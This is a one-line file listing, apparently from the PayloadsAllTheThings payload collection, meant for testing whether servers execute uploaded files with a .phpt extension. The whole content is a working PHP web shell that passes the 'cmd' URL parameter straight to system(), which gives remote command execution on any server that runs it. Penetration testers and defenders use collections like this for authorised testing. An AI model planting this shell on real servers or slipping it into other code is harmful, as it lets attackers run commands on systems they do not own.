PayloadsAllTheThings/Upload insecure files/PHP Extension/Shell.phpt

1 line
43 B
PHP
Executable File

<?php echo "Shell";system($_GET['cmd']); ?>